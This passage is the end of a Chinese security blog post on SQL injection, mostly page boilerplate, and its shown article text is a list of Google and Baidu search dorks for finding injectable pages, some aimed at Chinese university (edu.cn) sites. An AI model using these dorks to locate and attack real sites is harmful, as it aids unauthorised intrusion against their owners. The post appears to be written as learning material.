<p>通过Google搜索可能存在注入的页面 <br><br>inurl:.php?id= <br><br>inurl:.jsp?id= <br><br>inurl:.asp?id= <br><br>inurl:/admin/login.php <br><br>inurl:.php?id= intitle:美女 <br><br>通过百度搜索可能在的注入页面 <br><br>inurl:news.asp?id= site:edu.cn <br><br>inurl:news.php?id= site:edu.cn <br><br>inurl:news.aspx?id= site:edu.cn <br></p>
</blockquote>

      
    </div>
    
    
    
		<div>
		  
			<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-本文结束<i class="fa fa-paw"></i>感谢您的阅读-</div>
    
</div>
		  
		</div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i>Web</a>
          
            <a href="/tags/SQL注入/" rel="tag"><i class="fa fa-tag"></i>SQL注入</a>
          
            <a href="/tags/安全/" rel="tag"><i class="fa fa-tag"></i>安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/19/201941/" rel="next" title="内网信息收集">
                <i class="fa fa-chevron-left"></i> 内网信息收集
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/19/201943/" rel="prev" title="burp suite介绍">
                burp suite介绍 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        
  <script>
    window._bd_share_config = {
      "common": {
        "bdText": "",
        "bdMini": "1",
        "bdMiniList": false,
        "bdPic": ""
      },
      "image": {
        "viewList": ["tsina", "douban", "sqq", "qzone", "weixin", "twi", "fbook"],
        "viewText": "分享到：",
        "viewSize": "16"
      },
      "slide": {
        "bdImg": "5",
        "bdPos": "left",
        "bdTop": "100"
      }
    }
  </script>

<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?'];
</script>

      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/avatar.jpg" alt="小维同学">
            
              <p class="site-author-name" itemprop="name">小维同学</p>
              <p class="site-description motion-element" itemprop="description">努力努力再努力</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">49</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">54</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
		  <!-- 网易音乐播放器 -->
			<div id="music163player">
				
			</div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ximcx.cn/" title="西门吹雪's Blog" target="_blank">西门吹雪's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://gcker.github.io" title="Allard博客" target="_blank">Allard博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://axiaowei.cn" title="互友链添加微信(ITxiaowei)" target="_blank">互友链添加微信(ITxiaowei)</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#实验环境"><span class="nav-text">实验环境</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入危害"><span class="nav-text">SQL注入危害</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL基础-查"><span class="nav-text">SQL基础(查)</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#查看数据库"><span class="nav-text">查看数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看数据库版本"><span class="nav-text">查看数据库版本</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看当前库"><span class="nav-text">查看当前库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看当前用户"><span class="nav-text">查看当前用户</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看当前时间"><span class="nav-text">查看当前时间</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#选择数据库"><span class="nav-text">选择数据库</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看库中的表"><span class="nav-text">查看库中的表</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看表结构"><span class="nav-text">查看表结构</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看表的详细属性"><span class="nav-text">查看表的详细属性</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#查看表记录"><span class="nav-text">查看表记录</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#infomation-schema表"><span class="nav-text">infomation_schema表</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入流程"><span class="nav-text">SQL注入流程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#手动注入实战（基础）"><span class="nav-text">手动注入实战（基础）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#基于错误的注入"><span class="nav-text">基于错误的注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#基于布尔的注入"><span class="nav-text">基于布尔的注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#基于UNION注入"><span class="nav-text">基于UNION注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#基于时间的盲注"><span class="nav-text">基于时间的盲注</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQLmap自动化注入（基础）"><span class="nav-text">SQLmap自动化注入（基础）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#常见参数及语句解析"><span class="nav-text">常见参数及语句解析</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#权限提升"><span class="nav-text">权限提升</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#实例"><span class="nav-text">实例</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">小维同学</span>

  
</div>






  <div class="theme-info">❤  <a class="theme-link" target="_blank" href="https://axiaowei.cn">LZL</a></div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
